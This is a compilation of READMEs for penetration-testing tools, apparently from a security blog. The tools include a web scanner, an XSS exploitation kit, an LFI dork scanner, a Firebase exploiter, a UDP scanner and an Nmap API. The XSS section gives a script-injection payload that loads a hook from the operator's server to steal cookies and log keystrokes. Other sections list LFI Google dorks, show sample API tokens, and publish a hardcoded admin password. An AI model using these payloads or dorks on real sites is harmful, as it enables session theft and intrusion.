  • After finding a vulnerability in the web application, the scanner will classify it in the following format:-
    • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
    • Here c (critical) denotes the most severe finding, whereas l (low) denotes the least vulnerable system.

Definitions:-

  • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices. Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

  • High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attacker’s control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.

  • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack. Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

  • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

  • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

  • CVSS V3 SCORE RANGE / SEVERITY IN ADVISORY (a small helper expressing this mapping follows the list):
    0.1 - 3.9 Low
    4.0 - 6.9 Medium
    7.0 - 8.9 High
    9.0 - 10.0 Critical
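A minimal helper expressing that score-to-severity mapping (treating a 0.0 score as informational is an assumption; CVSS itself labels it "None"):

def cvss_to_severity(score: float) -> str:
    """Map a CVSS v3 base score to the advisory severity ranges listed above."""
    if score >= 9.0:
        return "Critical"
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    if score >= 0.1:
        return "Low"
    return "Info"


print(cvss_to_severity(7.5))  # -> High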

Vulnerabilities

  • After this, the scanner will show results which include:
    • Response time
    • Total time for scanning
    • Class of vulnerability

Remediation

  • Now, the scanner will explain the harmful effects of that specific type of vulnerability.
  • The scanner points to sources (websites) to learn more about the vulnerabilities.
  • After this step, the scanner suggests some remedies to overcome the vulnerabilities.

Phase 3

  • Scanner will Generate a proper report including
    • Total number of vulnerabilities scanned
    • Total number of vulnerabilities skipped
    • Total number of vulnerabilities detected
    • Time taken for total scan
    • Details about each and every vulnerability.
  • For debugging purposes, the output of all scan tools is written into SA-Debug-ScanLog under the same directory; you can view the complete output generated by all the tools there.

Use

Run the program as: python3 web_scan.py (https or http)://example.com
--help
--update
Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
1 IPv6 2 Wordpress
3 SiteMap/Robot.txt 4 Firewall
5 Slowloris Denial of Service 6 HEARTBLEED
7 POODLE 8 OpenSSL CCS Injection
9 FREAK 10 Firewall
11 LOGJAM 12 FTP Service
13 STUXNET 14 Telnet Service
15 LOG4j 16 Stress Tests
17 WebDAV 18 LFI, RFI or RCE.
19 XSS, SQLi, BSQL 20 XSS Header not present
21 Shellshock Bug 22 Leaks Internal IP
23 HTTP PUT DEL Methods 24 MS10-070
25 Outdated 26 CGI Directories
27 Interesting Files 28 Injectable Paths
29 Subdomains 30 MS-SQL DB Service
31 ORACLE DB Service 32 MySQL DB Service
33 RDP Server over UDP and TCP 34 SNMP Service
35 Elmah 36 SMB Ports over TCP and UDP
37 IIS WebDAV 38 X-XSS Protection

Installation

git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt

Screenshots of Scanner

Contributions

Template contributions, feature requests and bug reports are more than welcome.

Authors

GitHub: @Malwareman007
GitHub: @Riya73
GitHub: @nano-bot01

Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.



XSS-Exploitation-Tool - An XSS Exploitation Tool

By: Zion3R


XSS Exploitation Tool is a penetration testing tool that focuses on the exploit of Cross-Site Scripting vulnerabilities.

This tool is for educational purposes only; do not use it against real environments.


Features

  • Technical Data about victim browser
  • Geolocation of the victim
  • Snapshot of the hooked/visited page
  • Source code of the hooked/visited page
  • Exfiltrate input field data
  • Exfiltrate cookies
  • Keylogging
  • Display alert box
  • Redirect user

Installation

Tested on Debian 11

You may need Apache, a MySQL database, and PHP with the following modules:

$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html

Install Git and pull the XSS-Exploitation-Tool source code:

$ sudo apt-get install git

$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/

Install composer, then install the application dependencies:

$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:www-data /var/www/

Init the database

$ sudo mysql

Creating a new user with specific rights:

MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> quit
Bye

Creating the database (will result in an empty page):

Visit the page http://server-ip/reset_database.php

Adapt the javascript hook file

The file hook.js is the JavaScript hook. Replace the IP address in its first line with the XSS Exploitation Tool server's IP address:

var address = "your server ip";

How it works

First, create a page (or exploit a Cross-Site Scripting vulnerability) to insert the Javascript hook file (see exploit.html at the root dir):

?vulnerable_param=<script src="http://your_server_ip/hook.js"/>

Then, when victims visit the hooked page, the XSS Exploitation Tool server should list the hooked browsers:

Screenshots



Lfi-Space - LFI Scan Tool

By: Zion3R

Written by TMRSWRR

Version 1.0.0

All-in-one tool for LFI VULN FINDER - LFI DORK FINDER

Instagram: TMRSWRR


Screenshots


How to use


Read Me

LFI Space is a robust and efficient tool designed to detect Local File Inclusion (LFI) vulnerabilities in web applications. This tool simplifies the process of identifying potential security flaws by leveraging two distinct scanning methods: Google Dork Search and Targeted URL Scan. With its comprehensive approach, LFI Space assists security professionals, penetration testers, and ethical hackers in assessing the security posture of web applications.

The Google Dork Search functionality within LFI Space harnesses the power of the Google search engine to identify web pages that may be susceptible to LFI attacks. By employing carefully crafted Google dorks, the tool retrieves search results that are likely to contain vulnerable pages. These dorks are specific queries designed to target common LFI vulnerability patterns in web applications. LFI Space then analyzes the responses from these pages, meticulously examining the content to identify any signs of LFI vulnerabilities. This approach allows for a broad and automated search, rapidly surfacing potential targets for further investigation.

Additionally, LFI Space provides a Targeted URL Scan feature, enabling users to manually input a list of specific URLs for scanning. This functionality allows for a more focused approach, enabling security professionals to assess particular web applications or pages of interest. By scanning each URL individually, LFI Space thoroughly inspects the target web pages for any signs of LFI vulnerabilities. This targeted approach provides flexibility and precision in identifying potential security weaknesses.

It is important to note that LFI Space is intended for responsible and authorized use, such as security testing, vulnerability assessments, or penetration testing, with proper consent and legal permissions. It is crucial to adhere to ethical guidelines and respect the privacy and security of targeted systems.

In conclusion, LFI Space is a powerful tool that combines Google Dork Search and Targeted URL Scan functionalities to detect Local File Inclusion vulnerabilities in web applications. By automating the search for potentially vulnerable pages and providing the ability to scan specific URLs, LFI Space empowers security professionals to identify LFI vulnerabilities effectively. With its user-friendly interface and comprehensive scanning capabilities, LFI Space is an invaluable asset for enhancing the security posture of web applications.

  • Google Dork Search: The tool queries the Google search engine to find web pages that may be vulnerable to LFI attacks based on carefully crafted Google dorks. It then analyzes the responses of these pages to determine if any LFI vulnerabilities exist.
  • Targeted URL Scan: The tool accepts a list of URLs as input and scans each URL for LFI vulnerabilities. This feature allows for a more focused approach, enabling users to assess specific web applications or pages of interest (a rough sketch of this mode follows below).
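A rough requests-based sketch of the targeted URL scan idea; the input file name, payload, and success marker are illustrative assumptions:

import requests

payload = "../../../../etc/passwd"
with open("urls.txt") as handle:  # one URL per line, each ending in a parameter, e.g. ...?page=
    for url in (line.strip() for line in handle if line.strip()):
        try:
            resp = requests.get(url + payload, timeout=10)
        except requests.RequestException:
            continue
        if "root:x:0:0" in resp.text:
            print(f"[+] Possible LFI: {url}{payload}")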

LFI Find Dork

inurl:/filedown.php?file=
inurl:/news.php?include=
inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
inurl:/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
inurl:/squirrelcart/cart_content.php?cart_isp_root=
inurl:index2.php?to=
inurl:index.php?load=
inurl:home.php?pagina=
/surveys/survey.inc.php?path=
index.php?body=
/classes/adodbt/sql.php?classes_dir=
enc/content.php?Home_Path=
  • This dork list is in the lfi2.txt file

Installation

Installation with requirements.txt

git clone https://github.com/capture0x/Lfi-Space/
cd Lfi-Space
pip3 install -r requirements.txt

Usage

python3 lfi.py

Bugs and enhancements

Contributions are welcome! If you find any issues or have suggestions for improvements, please open an issue or submit a pull request.

For bug reports or enhancements, please open an issue here.

Copyright 2023



Metlo - An Open-Source API Security Platform

By: Zion3R

Secure Your API.


Metlo is an open-source API security platform

With Metlo you can:

  • Create an Inventory of all your API Endpoints and Sensitive Data.
  • Detect common API vulnerabilities.
  • Proactively test your APIs before they go into production.
  • Detect API attacks in real time.

Metlo does this by scanning your API traffic using one of our connectors and then analyzing trace data.


There are three ways to get started with Metlo. Metlo Cloud, Metlo Self Hosted, and our Open Source product. We recommend Metlo Cloud for almost all users as it scales to 100s of millions of requests per month and all upgrades and migrations are managed for you.

You can get started with Metlo Cloud right away without a credit card. Just make an account on https://app.metlo.com and follow the instructions in our docs here.

Although we highly recommend Metlo Cloud, if you're a large company or need an air-gapped system you can self-host Metlo as well! Create an account on https://my.metlo.com and follow the instructions in our docs here to set up Metlo in your own cloud environment.

If you want to deploy our Open Source product we have instructions for AWS, GCP, Azure and Docker.

You can also join our Discord community if you need help or just want to chat!

Features

  • Endpoint Discovery - Metlo scans network traffic and creates an inventory of every single endpoint in your API.
  • Sensitive Data Scanning - Each endpoint is scanned for PII data and given a risk score.
  • Vulnerability Discovery - Get Alerts for issues like unauthenticated endpoints returning sensitive data, No HSTS headers, PII data in URL params, Open API Spec Diffs and more
  • API Security Testing - Build security tests directly in Metlo. Autogenerate tests for OWASP Top 10 vulns like BOLA, Broken Authentication, SQL Injection and more.
  • CI/CD Integration - Integrate with your CI/CD to find issues in development and staging.
  • Attack Detection - Our ML Algorithms build a model for baseline API behavior. Any deviation from this baseline is surfaced to your security team as soon as possible.
  • Attack Context - Metlo’s UI gives you full context around any attack to help quickly fix the vulnerability.

Testing

For tests that we can't autogenerate, our built-in testing framework helps you get to 100% security coverage on your highest-risk APIs. You can build tests in a YAML format to make sure your API is working as intended.

For example the following test checks for broken authentication:

id: test-payment-processor-metlo.com-user-billing

meta:
  name: test-payment-processor.metlo.com/user/billing Test Auth
  severity: CRITICAL
  tags:
    - BROKEN_AUTHENTICATION

test:
  - request:
      method: POST
      url: https://test-payment-processor.metlo.com/user/billing
      headers:
        - name: Content-Type
          value: application/json
        - name: Authorization
          value: ...
      data: |-
        { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
    assert:
      - key: resp.status
        value: 200
  - request:
      method: POST
      url: https://test-payment-processor.metlo.com/user/billing
      headers:
        - name: Content-Type
          value: application/json
      data: |-
        { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
    assert:
      - key: resp.status
        value: [ 401, 403 ]

You can see more information on our docs.

Why Metlo?

Most businesses have adopted public facing APIs to power their websites and apps. This has dramatically increased the attack surface for your business. There’s been a 200% increase in API security breaches in just the last year with the APIs of companies like Uber, Meta, Experian and Just Dial leaking millions of records. It's obvious that tools are needed to help security teams make APIs more secure but there's no great solution on the market.

Some solutions require you to go through sales calls to even try the product, while others have you send all your API traffic to their own cloud. Metlo is the first Open Source API security platform that you can self host, and get started for free right away!

We're Hiring!

We would love for you to come help us make Metlo better. Come join us at Metlo!

Open-source vs. paid

This repo is entirely MIT licensed. Features like user management, user roles and attack protection require an enterprise license. Contact us for more information.

Development

Checkout our development guide for more info on how to develop Metlo locally.



FirebaseExploiter - Vulnerability Discovery Tool That Discovers Firebase Database Which Are Open And Can Be Exploitable


FirebaseExploiter is a vulnerability discovery tool that discovers Firebase databases which are open and exploitable. Primarily built for mass hunting bug bounties and for penetration testing.

Features

  • Mass vulnerability scanning from list of hosts
  • Custom JSON data in exploit.json to upload during exploit
  • Custom URI path for exploit
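The underlying check for an open Firebase Realtime Database typically boils down to an unauthenticated read of the database's /.json endpoint. A minimal sketch (the project URL is a placeholder, and this is not FirebaseExploiter's Go code):

import requests

db = "https://example-project.firebaseio.com"
resp = requests.get(f"{db}/.json", timeout=10)
if resp.status_code == 200:
    print("[+] Database readable without authentication")
elif resp.status_code in (401, 403):
    print("[-] Access denied (security rules enforced)")
else:
    print(f"[?] Unexpected response: {resp.status_code}")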

Usage

This will display help for the CLI tool. Here are all the required arguments it supports.

Installation

FirebaseExploiter was built using go1.19. Make sure you use the latest version of Go to install it successfully. Run the following command to install the latest version:

go install -v github.com/securebinary/firebaseExploiter@latest

Running FirebaseExploiter

To scan a specific domain to check for Insecure Firebase DB.

To exploit a Firebase DB to write your own JSON document in it.

Create your own exploit.json file in proper JSON format to exploit vulnerable Firebase DBs.

Checking the exploited URL to verify the vulnerability.

Adding custom path for exploiting Firebase DBs.

Mass scanning for Insecure Firebase Databases from list of target hosts.

Exploiting vulnerable Firebase DBs from the list of target hosts.

License

FirebaseExploiter is made with love by the SecureBinary team. Any tweaks / community contribution are welcome.


UDPX - Fast And Lightweight, UDPX Is A Single-Packet UDP Scanner Written In Go That Supports The Discovery Of Over 45 Services With The Ability To Add Custom Ones


Fast and lightweight, UDPX is a single-packet UDP scanner written in Go that supports the discovery of over 45 services with the ability to add custom ones. It is easy to use and portable, and can be run on Linux, Mac OS, and Windows. Unlike internet-wide scanners like zgrab2 and zmap, UDPX is designed for portability and ease of use.

  • It is fast. It can scan a whole /16 network in ~20 seconds for a single service.
  • You don't need to install libpcap or any other dependencies.
  • Can run on Linux, macOS, Windows. Or your Nethunter if you built it for ARM.
  • Customizable. You can add your own probes and test for even more protocols.
  • Stores results in JSONL format.
  • Also scans domain names.

How it works

Scanning UDP ports is very different from scanning TCP - you may or may not get a result back from probing a UDP port, as UDP is a connectionless protocol. UDPX implements a single-packet approach: a protocol-specific packet is sent to the defined service (port) and the scanner waits for a response. The limit is set to 500 ms by default and can be changed with the -w flag. If the service sends a packet back within this time, it is certain that it is indeed listening on that port and is reported as open.

A typical technique is to send 0-byte UDP packets to each port on the target machine. If we receive an "ICMP Port Unreachable" message, the port is closed. If a UDP response is received to the probe (unusual), the port is open. If we get no response at all, the state is open or filtered, meaning that the port is either open or packet filters are blocking the communication. This method is not implemented in UDPX, as there is no added value (UDPX tests only for specific protocols).
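The single-packet idea can be sketched in a few lines of Python (UDPX itself is written in Go); here a standard NTP client packet serves as the protocol-specific probe:

import socket

probe = b"\x1b" + 47 * b"\x00"   # minimal 48-byte NTP v3 client request
target = ("pool.ntp.org", 123)

with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
    sock.settimeout(0.5)         # mirrors UDPX's 500 ms default wait
    sock.sendto(probe, target)
    try:
        data, addr = sock.recvfrom(1024)
        print(f"open: {addr[0]}:123 replied with {len(data)} bytes")
    except socket.timeout:
        print("no reply: open|filtered or closed")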

Usage

Concurrency: By default, concurrency is set to 32 connections only (so you don't crash anything). If you have a lot of hosts to scan, you can set it to 128 or 256 connections. Based on your hardware, connection stability, and ulimit (on *nix), you can run 512 or more concurrent connections, but this is not recommended.

To scan a single IP:

udpx -t 1.1.1.1

To scan a CIDR with maximum of 128 connections and timeout of 1000 ms:

udpx -t 1.2.3.4/24 -c 128 -w 1000

To scan targets from file with maximum of 128 connections for only specific service:

udpx -tf targets.txt -c 128 -s ipmi

Target can be:

  • IP address
  • CIDR
  • Domain

IPv6 is supported.

If you want to store the results, use flag -o [filename]. Output is in JSONL format, as can be seen below:

{"address":"45.33.32.156","hostname":"scanme.nmap.org","port":123,"service":"ntp","response_data":"JAME6QAAAEoAAA56LU9vp+d2ZPwOYIyDxU8jS3GxUvM="}

Options


__ ______ ____ _ __
/ / / / __ \/ __ \ |/ /
/ / / / / / / /_/ / /
/ /_/ / /_/ / ____/ |
\____/_____/_/ /_/|_|
v1.0.2-beta, by @nullt3r

Usage of ./udpx-linux-amd64:
-c int
Maximum number of concurrent connections (default 32)
-nr
Do not randomize addresses
-o string
Output file to write results
-s string
Scan only for a specific service, one of: ard, bacnet, bacnet_rpm, chargen, citrix, coap, db, db, digi1, digi2, digi3, dns, ipmi, ldap, mdns, memcache, mssql, nat_port_mapping, natpmp, netbios, netis, ntp, ntp_monlist, openvpn, pca_nq, pca_st, pcanywhere, portmap, qotd, rdp, ripv, sentinel, sip, snmp1, snmp2, snmp3, ssdp, tftp, ubiquiti, ubiquiti_discovery_v1, ubiquiti_discovery_v2, upnp, valve, wdbrpc, wsd, wsd_malformed, xdmcp, kerberos, ike
-sp
Show received packets (only first 32 bytes)
-t string
IP/CIDR to scan
-tf string
File containing IPs/CIDRs to scan
-w int
Maximum time to wait for a response (socket timeout) in ms (default 500)

Building

You can grab prebuilt binaries in the release section. If you want to build UDPX from source, follow these steps:

From git:

git clone https://github.com/nullt3r/udpx
cd udpx
go build ./cmd/udpx

You can find the binary in the current directory.

Or via go:

go install -v github.com/nullt3r/udpx/cmd/udpx@latest

After that, you can find the binary in $HOME/go/bin/udpx. If you want, move binary to /usr/local/bin/ so you can call it directly.

Supported services

UDPX supports more than 45 services. The most interesting are:

  • ipmi
  • snmp
  • ike
  • tftp
  • openvpn
  • kerberos
  • ldap

The complete list of supported services:

  • ard
  • bacnet
  • bacnet_rpm
  • chargen
  • citrix
  • coap
  • db
  • db
  • digi1
  • digi2
  • digi3
  • dns
  • ipmi
  • ldap
  • mdns
  • memcache
  • mssql
  • nat_port_mapping
  • natpmp
  • netbios
  • netis
  • ntp
  • ntp_monlist
  • openvpn
  • pca_nq
  • pca_st
  • pcanywhere
  • portmap
  • qotd
  • rdp
  • ripv
  • sentinel
  • sip
  • snmp1
  • snmp2
  • snmp3
  • ssdp
  • tftp
  • ubiquiti
  • ubiquiti_discovery_v1
  • ubiquiti_discovery_v2
  • upnp
  • valve
  • wdbrpc
  • wsd
  • wsd_malformed
  • xdmcp
  • kerberos
  • ike

How to add your own probe?

Please send a feature request with protocol name and port and I will make it happen. Or add it on your own, the file pkg/probes/probes.go contains all available payloads. Specify the protocol name, port and packet data (hex-encoded).

{
    Name: "ike",
    Payloads: []string{"5b5e64c03e99b51100000000000000000110020000000000000001500000013400000001000000010000012801010008030000240101"},
    Port: []int{500, 4500},
},

Credits

Disclaimer

I am not responsible for any damages. You are responsible for your own actions. Scanning or attacking targets without prior mutual consent can be illegal.

License

UDPX is distributed under MIT License.



Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

How it works β€’ Installation β€’ Usage β€’ MODES β€’ For Developers β€’ Credits

Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

[Thanks ChatGPT for the Description]


How it Works ?

This tool mainly performs 3 tasks

  1. Effective Subdomain Enumeration from Various Tools
  2. Get URLs with open HTTP and HTTPS service.
  3. Run Nuclei and other scans on the previous output.

So basically, this is an automation script for your initial recon in bug bounty.

Install SCRIPTKIDDI3

SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirements:

git clone https://github.com/thecyberneh/scriptkiddi3.git
cd scriptkiddi3
bash installer.sh

Usage

scriptkiddi3 -h

This will display help for the tool. Here are all the switches it supports.

[ABOUT:]
Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
A recon and initial vulnerability detection tool built using shell script and open source tools.


[Usage:]
scriptkiddi3 [MODE] [FLAGS]
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


[MODES:]
['-m'/'--mode']
Available Options for MODE:
SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
URL | url Run scriptkiddi3 in URL ENUMERATION mode
EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


Feature of EXPLOIT mode : subdomain enumeration, URL Enumeration,
Vulnerability Detection with Nuclei,
and Scan for SUBDOMAIN TAKEOVER

[FLAGS:]
[TARGET:] -d, --domain target domain to scan

[CONFIG:] -c, --config path of your configuration file for subfinder

[HELP:] -h, --help to get help menu

[UPDATE:] -u, --update to update tool

[Examples:]
Run scriptkiddi3 in full Exploitation mode
scriptkiddi3 -m EXP -d target.com


Use your own CONFIG file for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
scriptkiddi3 -m SUB -d target.com


Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m SUB -d target.com

MODES

1. FULL EXPLOITATION MODE

Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

  scriptkiddi3 -m EXP -d target.com

FULL EXPLOITATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • Effective URL Enumeration ( HTTP and HTTPs service )
  • Run Vulnerability Detection with Nuclei
  • Subdomain Takeover Test on previous results

2. SUBDOMAIN ENUMERATION MODE

Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

  scriptkiddi3 -m SUB -d target.com

SUBDOMAIN ENUMERATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • You can use this mode if you only want to get subdomains from this tool, or in other words, automation of subdomain enumeration by different tools

3. URL ENUMERATION MODE

Run scriptkiddi3 in URL ENUMERATION MODE

  scriptkiddi3 -m URL -d target.com

URL ENUMERATION MODE contains the following functions:

  • Same features as SUBDOMAIN ENUMERATION MODE, but also identifies live HTTP and HTTPS services

Using your own CONFIG File for subfinder

  scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

You can also provide your own CONFIG file with your API keys for subdomain enumeration with subfinder.

Updating the tool to the latest version

You can run the following command to update the tool:

  scriptkiddi3 -u

An Example of config.yaml

binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
- zoomeye_username:zoomeye_password

For Developers

If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

If you have any other queries, you can always contact me on Twitter (thecyberneh).

Credits

I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



Nmap-API - Uses Python3.10, Debian, python-Nmap, And Flask Framework To Create A Nmap API That Can Do Scans With A Good Speed Online And Is Easy To Deploy


Uses Python 3.10, Debian, python-Nmap, and the Flask framework to create an Nmap API that can run scans quickly online and is easy to deploy.

This is an implementation of our college PCL project, which is still under development and constantly being updated.


API Reference

Get all items

  GET /api/p1/{username}:{password}/{target}
  GET /api/p2/{username}:{password}/{target}
  GET /api/p3/{username}:{password}/{target}
  GET /api/p4/{username}:{password}/{target}
  GET /api/p5/{username}:{password}/{target}
Parameter Type Description
username string Required. username of the current user
password string Required. current user password
target string Required. The target Hostname and IP

Get item

  GET /api/p1/
  GET /api/p2/
  GET /api/p3/
  GET /api/p4/
  GET /api/p5/
Parameter Return data Description Nmap Command
p1 json Effective Scan -Pn -sV -T4 -O -F
p2 json Simple Scan -Pn -T4 -A -v
p3 json Low Power Scan -Pn -sS -sU -T4 -A -v
p4 json Partial Intense Scan -Pn -p- -T4 -A -v
p5 json Complete Intense Scan -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln
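As a quick illustration, a scan can be requested with a plain HTTP GET. The host and port below are assumptions for a local Flask deployment (adjust them to wherever the API is actually running), and the username, password, and target are placeholders:

  curl "http://127.0.0.1:5000/api/p2/myuser:mypassword/scanme.nmap.org"    # Simple Scan profile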

Auth and User management

  POST /adduser/{admin-username}:{admin-passwd}/{id}/{username}/{passwd}
POST /deluser/{admin-username}:{admin-passwd}/{t-username}/{t-userpass}
POST /altusername/{admin-username}:{admin-passwd}/{t-user-id}/{new-t-username}
POST /altuserid/{admin-username}:{admin-passwd}/{new-t-user-id}/{t-username}
POST /altpassword/{admin-username}:{admin-passwd}/{t-username}/{new-t-userpass}
  • make sure you use the ADMIN CREDS MENTIONED BELOW
Parameter Type Description
admin-username String Admin username
admin-passwd String Admin password
id String Id for newly added user
username String Username of the newly added user
passwd String Password of the newly added user
t-username String Target username
t-user-id String Target userID
t-userpass String Target users password
new-t-username String New username for the target
new-t-user-id String New userID for the target
new-t-userpass String New password for the target

DEFAULT CREDENTIALS

ADMINISTRATOR : zAp6_oO~t428)@,
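As a rough sketch, a new user could be added with the administrator credentials above (assuming the admin username is literally ADMINISTRATOR); the host, port, id, username, and password below are placeholders:

  curl -X POST "http://127.0.0.1:5000/adduser/ADMINISTRATOR:zAp6_oO~t428)@,/2/newuser/newpass"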



QuadraInspect - Android Framework That Integrates AndroPass, APKUtil, And MobFS, Providing A Powerful Tool For Analyzing The Security Of Android Applications


The security of mobile devices has become a critical concern due to the increasing amount of sensitive data being stored on them. With the rise of Android OS as the most popular mobile platform, the need for effective tools to assess its security has also increased. In response to this need, a new Android framework has emerged that combines powerful tools (AndroPass, APKUtil, RMS, and MobFS) to conduct comprehensive vulnerability analysis of Android applications. This framework is known as QuadraInspect.

QuadraInspect is an Android framework that integrates AndroPass, APKUtil, RMS, and MobFS, providing a powerful tool for analyzing the security of Android applications. AndroPass focuses on analyzing the security of Android applications' authentication and authorization mechanisms, while APKUtil extracts valuable information from an APK file. Lastly, MobFS and RMS facilitate the analysis of an application's filesystem by mounting its storage in a virtual environment.

By combining these tools, QuadraInspect provides a comprehensive approach to vulnerability analysis of Android applications. This framework can be used by developers, security researchers, and penetration testers to assess the security of their own or third-party applications. QuadraInspect provides a unified interface for all of the integrated tools, making it easier to use and reducing the time required to conduct comprehensive vulnerability analysis. Ultimately, this framework aims to increase the security of Android applications and protect users' sensitive data from potential threats.


Requirements

  • Windows, Linux or Mac
  • NodeJs installed
  • Python 3 installed
  • OpenSSL-3 installed
  • Wkhtmltopdf installed

Installation

To install the tool:

First: git clone https://github.com/morpheuslord/QuadraInspect

Second: Open an administrative cmd or PowerShell (for the MobFS setup) and run: pip install -r requirements.txt && python3 main.py

Third: Once QuadraInspect loads, run this command at the QuadraInspect Main>> prompt: START install_tools

The tools will be downloaded to the tools directory, and the setup.py and setup.bat scripts will run automatically to complete the installation.

Usage

Each module has a help function, so the commands and their descriptions are detailed and can be adjusted for operation.

These are the key points that must be addressed for smooth operation:

  • The APK file or target must be declared before starting any attack.
  • The attacks are separate entities combined via this framework; doing research on how to use each of them is recommended.
  • The APK file can be declared either using args or using SET target within the tool.
  • The target APK file must be placed in the target folder, as all the tools search for the target file in that folder.

Modes

There are 2 modes:

|
└─> F mode
└─> A mode

F mode

The F mode is the mode where you get the active interface for using the interactive version of the framework, with the prompt, etc.

F mode is the normal mode and can be used easily.

A mode

A mode, or argumentative mode, takes input via arguments and runs the commands without any intervention by the user. This is currently limited to the main menu; in the future I plan to extend this feature to the incorporated tools as well.

python main.py --target <APK_file> --mode a --command install_tools/tools_name/apkleaks/mobfs/rms/apkleaks

Main Module

The main menu of the entire tool has these options and commands:

Command Description
SET target Set the name of the target file
START install_tools If not installed, this will install the tools
LIST tools_name List the integrated tools
START apkleaks Use the APKLeaks tool
START mobfs Use MobFS for dynamic and static analysis
START andropass Use the AndroPass APK analyzer
help Display help menu
SHOW banner Display banner
quit Quit the program

As mentioned above, the target must be set before any tool is used.
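For reference, a typical interactive (F mode) session might look like the following; the APK file name is a hypothetical placeholder, and the prompt string is taken from the installation step above:

  python3 main.py
  QuadraInspect Main>> : START install_tools
  QuadraInspect Main>> : SET target demo.apk
  QuadraInspect Main>> : START apkleaks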

Apkleaks menu

The APKLeaks menu is also really straightforward, with only a few things to consider:

  • The options SET output and SET json-out take file names, not actual file paths; the output is created in the result directory.
  • The SET pattern option takes the name of a JSON pattern file. The JSON file must be located in the pattern directory.
OPTION SET Value
SET output Output for the scan data file name
SET arguments Additional Disassembly arguments
SET json-out JSON output file name
SET pattern The pre-searching pattern for secrets
help Displays help menu
return Return to main menu
quit Quit the tool
